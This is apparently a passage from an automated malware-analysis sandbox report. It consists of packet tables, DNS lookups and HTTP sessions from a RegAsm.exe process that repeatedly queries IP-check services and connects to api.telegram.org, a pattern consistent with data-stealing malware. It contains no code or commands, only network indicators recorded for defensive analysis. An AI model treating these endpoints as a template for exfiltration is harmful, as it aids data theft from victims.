                                                                            Jan 9, 2025 11:41:49.301742077 CET50247443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:41:49.301754951 CET44350247149.154.167.220192.168.2.4
                                                                            Jan 9, 2025 11:41:49.305085897 CET8050246132.226.247.73192.168.2.4
                                                                            Jan 9, 2025 11:41:49.305131912 CET5024680192.168.2.4132.226.247.73
                                                                            Jan 9, 2025 11:41:49.924595118 CET44350247149.154.167.220192.168.2.4
                                                                            Jan 9, 2025 11:41:49.924716949 CET50247443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:41:49.926219940 CET50247443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:41:49.926228046 CET44350247149.154.167.220192.168.2.4
                                                                            Jan 9, 2025 11:41:49.926454067 CET44350247149.154.167.220192.168.2.4
                                                                            Jan 9, 2025 11:41:49.978523970 CET50247443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:41:50.634020090 CET50247443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:41:50.634103060 CET44350247149.154.167.220192.168.2.4
                                                                            Jan 9, 2025 11:41:50.634201050 CET50247443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:41:50.726114988 CET5024980192.168.2.4132.226.247.73
                                                                            Jan 9, 2025 11:41:50.730956078 CET8050249132.226.247.73192.168.2.4
                                                                            Jan 9, 2025 11:41:50.731020927 CET5024980192.168.2.4132.226.247.73
                                                                            Jan 9, 2025 11:41:50.731112003 CET5024980192.168.2.4132.226.247.73
                                                                            Jan 9, 2025 11:41:50.735852957 CET8050249132.226.247.73192.168.2.4
                                                                            Jan 9, 2025 11:41:51.424479008 CET8050249132.226.247.73192.168.2.4
                                                                            Jan 9, 2025 11:41:51.433800936 CET5024980192.168.2.4132.226.247.73
                                                                            Jan 9, 2025 11:41:51.434520006 CET50250443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:41:51.434561968 CET44350250149.154.167.220192.168.2.4
                                                                            Jan 9, 2025 11:41:51.434619904 CET50250443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:41:51.435329914 CET50250443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:41:51.435342073 CET44350250149.154.167.220192.168.2.4
                                                                            Jan 9, 2025 11:41:51.438824892 CET8050249132.226.247.73192.168.2.4
                                                                            Jan 9, 2025 11:41:51.438874006 CET5024980192.168.2.4132.226.247.73
                                                                            Jan 9, 2025 11:41:52.060075045 CET44350250149.154.167.220192.168.2.4
                                                                            Jan 9, 2025 11:41:52.060260057 CET50250443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:41:52.061553955 CET50250443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:41:52.061563969 CET44350250149.154.167.220192.168.2.4
                                                                            Jan 9, 2025 11:41:52.061785936 CET44350250149.154.167.220192.168.2.4
                                                                            Jan 9, 2025 11:41:52.271331072 CET44350250149.154.167.220192.168.2.4
                                                                            Jan 9, 2025 11:41:52.272469997 CET50250443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:41:52.787595987 CET50250443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:41:52.787667990 CET44350250149.154.167.220192.168.2.4
                                                                            Jan 9, 2025 11:41:52.787741899 CET50250443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:41:52.892612934 CET5025280192.168.2.4132.226.247.73
                                                                            Jan 9, 2025 11:41:53.038981915 CET8050252132.226.247.73192.168.2.4
                                                                            Jan 9, 2025 11:41:53.039053917 CET5025280192.168.2.4132.226.247.73
                                                                            Jan 9, 2025 11:41:53.039181948 CET5025280192.168.2.4132.226.247.73
                                                                            Jan 9, 2025 11:41:53.043922901 CET8050252132.226.247.73192.168.2.4
                                                                            Jan 9, 2025 11:41:53.731043100 CET8050252132.226.247.73192.168.2.4
                                                                            Jan 9, 2025 11:41:53.739620924 CET5025280192.168.2.4132.226.247.73
                                                                            Jan 9, 2025 11:41:53.740710974 CET50253443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:41:53.740751028 CET44350253149.154.167.220192.168.2.4
                                                                            Jan 9, 2025 11:41:53.740808964 CET50253443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:41:53.741548061 CET50253443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:41:53.741563082 CET44350253149.154.167.220192.168.2.4
                                                                            Jan 9, 2025 11:41:53.744771004 CET8050252132.226.247.73192.168.2.4
                                                                            Jan 9, 2025 11:41:53.744816065 CET5025280192.168.2.4132.226.247.73
                                                                            Jan 9, 2025 11:41:54.371352911 CET44350253149.154.167.220192.168.2.4
                                                                            Jan 9, 2025 11:41:54.372328997 CET50253443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:41:54.376323938 CET50253443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:41:54.376333952 CET44350253149.154.167.220192.168.2.4
                                                                            Jan 9, 2025 11:41:54.376573086 CET44350253149.154.167.220192.168.2.4
                                                                            Jan 9, 2025 11:41:54.572419882 CET50253443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:41:55.095882893 CET50253443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:41:55.095951080 CET44350253149.154.167.220192.168.2.4
                                                                            Jan 9, 2025 11:41:55.096149921 CET44350253149.154.167.220192.168.2.4
                                                                            Jan 9, 2025 11:41:55.096158028 CET50253443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:41:55.096220016 CET50253443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:41:55.217289925 CET5025580192.168.2.4132.226.247.73
                                                                            Jan 9, 2025 11:41:55.222100973 CET8050255132.226.247.73192.168.2.4
                                                                            Jan 9, 2025 11:41:55.222223043 CET5025580192.168.2.4132.226.247.73
                                                                            Jan 9, 2025 11:41:55.222292900 CET5025580192.168.2.4132.226.247.73
                                                                            Jan 9, 2025 11:41:55.227068901 CET8050255132.226.247.73192.168.2.4
                                                                            Jan 9, 2025 11:41:55.903985023 CET8050255132.226.247.73192.168.2.4
                                                                            Jan 9, 2025 11:41:55.915066957 CET50256443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:41:55.915098906 CET44350256149.154.167.220192.168.2.4
                                                                            Jan 9, 2025 11:41:55.915158987 CET50256443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:41:55.915297985 CET5025580192.168.2.4132.226.247.73
                                                                            Jan 9, 2025 11:41:55.915630102 CET50256443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:41:55.915642977 CET44350256149.154.167.220192.168.2.4
                                                                            Jan 9, 2025 11:41:55.920238018 CET8050255132.226.247.73192.168.2.4
                                                                            Jan 9, 2025 11:41:55.920277119 CET5025580192.168.2.4132.226.247.73
                                                                            Jan 9, 2025 11:41:56.530081987 CET44350256149.154.167.220192.168.2.4
                                                                            Jan 9, 2025 11:41:56.533837080 CET50256443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:41:56.533837080 CET50256443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:41:56.533857107 CET44350256149.154.167.220192.168.2.4
                                                                            Jan 9, 2025 11:41:56.534092903 CET44350256149.154.167.220192.168.2.4
                                                                            Jan 9, 2025 11:41:56.672698021 CET50256443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:41:57.458369017 CET50256443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:41:57.458470106 CET44350256149.154.167.220192.168.2.4
                                                                            Jan 9, 2025 11:41:57.458534956 CET50256443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:41:57.554429054 CET5025880192.168.2.4132.226.247.73
                                                                            Jan 9, 2025 11:41:57.559231997 CET8050258132.226.247.73192.168.2.4
                                                                            Jan 9, 2025 11:41:57.559298038 CET5025880192.168.2.4132.226.247.73
                                                                            Jan 9, 2025 11:41:57.559390068 CET5025880192.168.2.4132.226.247.73
                                                                            Jan 9, 2025 11:41:57.564142942 CET8050258132.226.247.73192.168.2.4
                                                                            Jan 9, 2025 11:41:58.239774942 CET8050258132.226.247.73192.168.2.4
                                                                            Jan 9, 2025 11:41:58.249434948 CET5025880192.168.2.4132.226.247.73
                                                                            Jan 9, 2025 11:41:58.249644041 CET50259443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:41:58.249713898 CET44350259149.154.167.220192.168.2.4
                                                                            Jan 9, 2025 11:41:58.250552893 CET50259443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:41:58.251569033 CET50259443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:41:58.251581907 CET44350259149.154.167.220192.168.2.4
                                                                            Jan 9, 2025 11:41:58.254419088 CET8050258132.226.247.73192.168.2.4
                                                                            Jan 9, 2025 11:41:58.254484892 CET5025880192.168.2.4132.226.247.73
                                                                            Jan 9, 2025 11:41:58.856393099 CET44350259149.154.167.220192.168.2.4
                                                                            Jan 9, 2025 11:41:58.856473923 CET50259443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:41:58.857644081 CET50259443192.168.2.4149.154.167.220
                                                                            Jan 9, 2025 11:41:58.857655048 CET44350259149.154.167.220192.168.2.4
                                                                            Jan 9, 2025 11:41:58.857860088 CET44350259149.154.167.220192.168.2.4
                                                                            Jan 9, 2025 11:41:58.978533030 CET50259443192.168.2.4149.154.167.220
                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                            Jan 9, 2025 11:37:53.927938938 CET5260853192.168.2.41.1.1.1
                                                                            Jan 9, 2025 11:37:53.934870005 CET53526081.1.1.1192.168.2.4
                                                                            Jan 9, 2025 11:37:54.844139099 CET6379053192.168.2.41.1.1.1
                                                                            Jan 9, 2025 11:37:54.851747990 CET53637901.1.1.1192.168.2.4
                                                                            Jan 9, 2025 11:38:02.429471970 CET5667753192.168.2.41.1.1.1
                                                                            Jan 9, 2025 11:38:02.436032057 CET53566771.1.1.1192.168.2.4
                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                            Jan 9, 2025 11:37:53.927938938 CET192.168.2.41.1.1.10xe1ccStandard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                            Jan 9, 2025 11:37:54.844139099 CET192.168.2.41.1.1.10xfceaStandard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                                            Jan 9, 2025 11:38:02.429471970 CET192.168.2.41.1.1.10x6a58Standard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                            Jan 9, 2025 11:37:53.934870005 CET1.1.1.1192.168.2.40xe1ccNo error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                            Jan 9, 2025 11:37:53.934870005 CET1.1.1.1192.168.2.40xe1ccNo error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                            Jan 9, 2025 11:37:53.934870005 CET1.1.1.1192.168.2.40xe1ccNo error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                            Jan 9, 2025 11:37:53.934870005 CET1.1.1.1192.168.2.40xe1ccNo error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                            Jan 9, 2025 11:37:53.934870005 CET1.1.1.1192.168.2.40xe1ccNo error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                            Jan 9, 2025 11:37:53.934870005 CET1.1.1.1192.168.2.40xe1ccNo error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                            Jan 9, 2025 11:37:54.851747990 CET1.1.1.1192.168.2.40xfceaNo error (0)reallyfreegeoip.org104.21.112.1A (IP address)IN (0x0001)false
                                                                            Jan 9, 2025 11:37:54.851747990 CET1.1.1.1192.168.2.40xfceaNo error (0)reallyfreegeoip.org104.21.96.1A (IP address)IN (0x0001)false
                                                                            Jan 9, 2025 11:37:54.851747990 CET1.1.1.1192.168.2.40xfceaNo error (0)reallyfreegeoip.org104.21.48.1A (IP address)IN (0x0001)false
                                                                            Jan 9, 2025 11:37:54.851747990 CET1.1.1.1192.168.2.40xfceaNo error (0)reallyfreegeoip.org104.21.80.1A (IP address)IN (0x0001)false
                                                                            Jan 9, 2025 11:37:54.851747990 CET1.1.1.1192.168.2.40xfceaNo error (0)reallyfreegeoip.org104.21.64.1A (IP address)IN (0x0001)false
                                                                            Jan 9, 2025 11:37:54.851747990 CET1.1.1.1192.168.2.40xfceaNo error (0)reallyfreegeoip.org104.21.16.1A (IP address)IN (0x0001)false
                                                                            Jan 9, 2025 11:37:54.851747990 CET1.1.1.1192.168.2.40xfceaNo error (0)reallyfreegeoip.org104.21.32.1A (IP address)IN (0x0001)false
                                                                            Jan 9, 2025 11:38:02.436032057 CET1.1.1.1192.168.2.40x6a58No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                                                            Jan 9, 2025 11:40:40.720551968 CET1.1.1.1192.168.2.40xf6edNo error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                            Jan 9, 2025 11:40:40.720551968 CET1.1.1.1192.168.2.40xf6edNo error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                            Jan 9, 2025 11:41:32.836911917 CET1.1.1.1192.168.2.40x2f3eNo error (0)edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.comdefault.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.comCNAME (Canonical name)IN (0x0001)false
                                                                            Jan 9, 2025 11:41:32.836911917 CET1.1.1.1192.168.2.40x2f3eNo error (0)default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com217.20.57.25A (IP address)IN (0x0001)false
                                                                            Jan 9, 2025 11:41:32.836911917 CET1.1.1.1192.168.2.40x2f3eNo error (0)default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com217.20.57.40A (IP address)IN (0x0001)false
                                                                            Jan 9, 2025 11:41:32.836911917 CET1.1.1.1192.168.2.40x2f3eNo error (0)default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com84.201.210.38A (IP address)IN (0x0001)false
                                                                            Jan 9, 2025 11:41:32.836911917 CET1.1.1.1192.168.2.40x2f3eNo error (0)default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com217.20.57.22A (IP address)IN (0x0001)false
                                                                            Jan 9, 2025 11:41:32.836911917 CET1.1.1.1192.168.2.40x2f3eNo error (0)default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com217.20.57.23A (IP address)IN (0x0001)false
                                                                            Jan 9, 2025 11:41:32.836911917 CET1.1.1.1192.168.2.40x2f3eNo error (0)default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com84.201.210.19A (IP address)IN (0x0001)false
                                                                            Jan 9, 2025 11:41:32.836911917 CET1.1.1.1192.168.2.40x2f3eNo error (0)default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com217.20.57.24A (IP address)IN (0x0001)false
                                                                            Jan 9, 2025 11:41:32.836911917 CET1.1.1.1192.168.2.40x2f3eNo error (0)default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com217.20.57.39A (IP address)IN (0x0001)false
                                                                            Jan 9, 2025 11:41:38.095154047 CET1.1.1.1192.168.2.40xece1No error (0)edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.comdefault.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.comCNAME (Canonical name)IN (0x0001)false
                                                                            Jan 9, 2025 11:41:38.095154047 CET1.1.1.1192.168.2.40xece1No error (0)default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com217.20.57.23A (IP address)IN (0x0001)false
                                                                            Jan 9, 2025 11:41:38.095154047 CET1.1.1.1192.168.2.40xece1No error (0)default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com84.201.210.38A (IP address)IN (0x0001)false
                                                                            Jan 9, 2025 11:41:38.095154047 CET1.1.1.1192.168.2.40xece1No error (0)default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com217.20.57.39A (IP address)IN (0x0001)false
                                                                            Jan 9, 2025 11:41:38.095154047 CET1.1.1.1192.168.2.40xece1No error (0)default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com84.201.210.19A (IP address)IN (0x0001)false
                                                                            Jan 9, 2025 11:41:38.095154047 CET1.1.1.1192.168.2.40xece1No error (0)default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com217.20.57.25A (IP address)IN (0x0001)false
                                                                            Jan 9, 2025 11:41:38.095154047 CET1.1.1.1192.168.2.40xece1No error (0)default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com217.20.57.22A (IP address)IN (0x0001)false
                                                                            Jan 9, 2025 11:41:38.095154047 CET1.1.1.1192.168.2.40xece1No error (0)default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com217.20.57.40A (IP address)IN (0x0001)false
                                                                            Jan 9, 2025 11:41:38.095154047 CET1.1.1.1192.168.2.40xece1No error (0)default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com217.20.57.24A (IP address)IN (0x0001)false
                                                                            Jan 9, 2025 11:41:40.390439987 CET1.1.1.1192.168.2.40x9470No error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                            Jan 9, 2025 11:41:40.390439987 CET1.1.1.1192.168.2.40x9470No error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                            • reallyfreegeoip.org
                                                                            • api.telegram.org
                                                                            • checkip.dyndns.org
                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            0192.168.2.449730132.226.247.73807588C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Jan 9, 2025 11:37:53.951436043 CET151OUTGET / HTTP/1.1
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                            Host: checkip.dyndns.org
                                                                            Connection: Keep-Alive
                                                                            Jan 9, 2025 11:37:54.629420042 CET273INHTTP/1.1 200 OK
                                                                            Date: Thu, 09 Jan 2025 10:37:54 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 104
                                                                            Connection: keep-alive
                                                                            Cache-Control: no-cache
                                                                            Pragma: no-cache
                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                            Jan 9, 2025 11:37:54.633781910 CET127OUTGET / HTTP/1.1
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                            Host: checkip.dyndns.org
                                                                            Jan 9, 2025 11:37:54.841947079 CET273INHTTP/1.1 200 OK
                                                                            Date: Thu, 09 Jan 2025 10:37:54 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 104
                                                                            Connection: keep-alive
                                                                            Cache-Control: no-cache
                                                                            Pragma: no-cache
                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                            Jan 9, 2025 11:38:01.297662973 CET127OUTGET / HTTP/1.1
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                            Host: checkip.dyndns.org
                                                                            Jan 9, 2025 11:38:01.525173903 CET127OUTGET / HTTP/1.1
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                            Host: checkip.dyndns.org
                                                                            Jan 9, 2025 11:38:01.837662935 CET127OUTGET / HTTP/1.1
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                            Host: checkip.dyndns.org
                                                                            Jan 9, 2025 11:38:02.425370932 CET273INHTTP/1.1 200 OK
                                                                            Date: Thu, 09 Jan 2025 10:38:02 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 104
                                                                            Connection: keep-alive
                                                                            Cache-Control: no-cache
                                                                            Pragma: no-cache
                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            1192.168.2.449733132.226.247.73807588C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Jan 9, 2025 11:38:04.671538115 CET127OUTGET / HTTP/1.1
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                            Host: checkip.dyndns.org
                                                                            Jan 9, 2025 11:38:05.351892948 CET273INHTTP/1.1 200 OK
                                                                            Date: Thu, 09 Jan 2025 10:38:05 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 104
                                                                            Connection: keep-alive
                                                                            Cache-Control: no-cache
                                                                            Pragma: no-cache
                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            2192.168.2.449735132.226.247.73807588C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Jan 9, 2025 11:38:07.065270901 CET151OUTGET / HTTP/1.1
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                            Host: checkip.dyndns.org
                                                                            Connection: Keep-Alive
                                                                            Jan 9, 2025 11:38:07.747430086 CET273INHTTP/1.1 200 OK
                                                                            Date: Thu, 09 Jan 2025 10:38:07 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 104
                                                                            Connection: keep-alive
                                                                            Cache-Control: no-cache
                                                                            Pragma: no-cache
                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            3192.168.2.449737132.226.247.73807588C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Jan 9, 2025 11:38:09.470597982 CET151OUTGET / HTTP/1.1
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                            Host: checkip.dyndns.org
                                                                            Connection: Keep-Alive
                                                                            Jan 9, 2025 11:38:10.170849085 CET273INHTTP/1.1 200 OK
                                                                            Date: Thu, 09 Jan 2025 10:38:10 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 104
                                                                            Connection: keep-alive
                                                                            Cache-Control: no-cache
                                                                            Pragma: no-cache
                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            4192.168.2.449740132.226.247.73807588C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Jan 9, 2025 11:38:11.882183075 CET151OUTGET / HTTP/1.1
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                            Host: checkip.dyndns.org
                                                                            Connection: Keep-Alive
                                                                            Jan 9, 2025 11:38:12.553884029 CET273INHTTP/1.1 200 OK
                                                                            Date: Thu, 09 Jan 2025 10:38:12 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 104
                                                                            Connection: keep-alive
                                                                            Cache-Control: no-cache
                                                                            Pragma: no-cache
                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            5192.168.2.449746132.226.247.73807588C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Jan 9, 2025 11:38:14.311359882 CET151OUTGET / HTTP/1.1
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                            Host: checkip.dyndns.org
                                                                            Connection: Keep-Alive
                                                                            Jan 9, 2025 11:38:15.005635023 CET273INHTTP/1.1 200 OK
                                                                            Date: Thu, 09 Jan 2025 10:38:14 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 104
                                                                            Connection: keep-alive
                                                                            Cache-Control: no-cache
                                                                            Pragma: no-cache
                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            6192.168.2.449749132.226.247.73807588C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Jan 9, 2025 11:38:16.732163906 CET151OUTGET / HTTP/1.1
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                            Host: checkip.dyndns.org
                                                                            Connection: Keep-Alive
